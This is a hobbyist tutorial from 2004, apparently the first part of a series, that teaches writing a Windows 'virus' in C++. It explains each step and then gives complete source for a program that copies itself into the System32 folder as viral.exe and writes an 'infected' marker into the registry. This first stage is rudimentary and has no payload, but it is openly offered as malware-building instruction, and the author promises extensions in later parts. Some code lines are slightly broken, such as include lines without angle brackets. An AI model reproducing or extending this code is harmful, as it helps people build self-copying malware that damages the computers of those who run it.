C++ Virus Guide :: Part 1


When I starting learning about viruses, I found that there was so many tutorials in ASM. This laugage is very popular with virus authours, but I perfer to use C++ which I'm going to show you now. In the first part I'm going to show have to copy a simple virus program in to a directory and then write in the registry to show that the virus has infected in the computer. 

NOTE: All code in this has been used with MVSC++6 and MVSC++ .NET

#include windows.h
#include string.h

These are the standard header files for the virus, and windows file is used with any program which you write for windows.  Also the string file is needed as we need this file to use the strcat function.

Next we need to set a varible which is needed.
The varible will store the path to the windows directory (C:\Windows), at will store up to 256 characters and this can be written as the following

char windir[MAX_PATH];

We now need to start the main function, and this will be where you store the rest of the code.It is the entry-point function called by the system as the initial entry point for a Windows-based application.

int APIENTRY WinMain(HINSTANCE hInstance,
                              HINSTANCE hPrevInstance,
                              LPSTR lpCmdLine,
                              
int nCmdShow)

This is the standard opening funtion for any windows program like

Private main() in VB
.START in ASM
void main() in C
begin in pascal

and so on and so forth. 


 

Ok then now we can set some more varibles in the main function. The first varible will store the pathname of the next varible will store the pathname of where you virus is at the time, the other will be used for the handle of the key, which will be entered into the registry.

char pathname[256];
HKEY hKey;

Right ok, its all the varibles done. We can get on with the real coding.  Like I said before this program will store and the pathname of the windows directory and store it to the varible 'windir'.  Too get the windows path we can use the code below which will save it to the windir varible.

GetWindowsDirectory(windir, sizeof(windir));

Now we got the pathname of the windows directory the next thing we have to do is find the name and path of the program itself

HMODULE hMe = GetModuleHandle(NULL);
DWORD nRet = GetModuleFileName(hMe, pathname, 256);

Now then, so we have the windows directory, program name and the path of it. Now what we need to do is to prepare the target path which will be C:\Windows\System32\ so we as before we found the windows directory which is stored in the varible windir and prepare the rest by adding it on to the end, plus what what you want to come in the outcome of the file to be, which I have named viral.exe.

Be using the CopyFile command, it'll copy the program itself "pathname" to where you want it "windir"

strcat(windir, "\\System32\\viral.exe");
CopyFile(pathname,windir,0); 


 

Using the Registry

I'm only going to show you a simple way of using the registry but I will be building on it on future parts to come.

First thing is to set whatever value to want. It will store the value into "reg" with up to 10 char, unless you change it.

unsigned char reg[10] = "infected";

Now create the key

RegCreateKey(HKEY_CURRENT_USER,"Software\\retro",&hKey);

And set the value to it

RegSetValueEx(hKey,"virus",0,REG_SZ,reg,sizeof(reg));

Close the key we have opened and end the WinMain function

RegCloseKey(hKey);

}


 Complete Code

#include windows.h
#include string.h

char windir[MAX_PATH];

int APIENTRY WinMain(HINSTANCE hInstance,
                              HINSTANCE hPrevInstance,
                              LPSTR lpCmdLine,
                              
int nCmdShow)
{

char pathname[256];
HKEY hKey;

GetWindowsDirectory(windir, sizeof(windir));
HMODULE hMe = GetModuleHandle(NULL);
DWORD nRet = GetModuleFileName(hMe, pathname, 256);

strcat(windir, "\\System32\\viral.exe");
CopyFile(pathname,windir,0);

unsigned char reg[10] = "infected";

RegCreateKey(HKEY_CURRENT_USER,"Software\\retro",&hKey);
RegSetValueEx(hKey,"virus",0,REG_SZ,reg,
sizeof(reg));
RegCloseKey(hKey);

}


 22nd March 2004

by Retro
http://retro.host.sk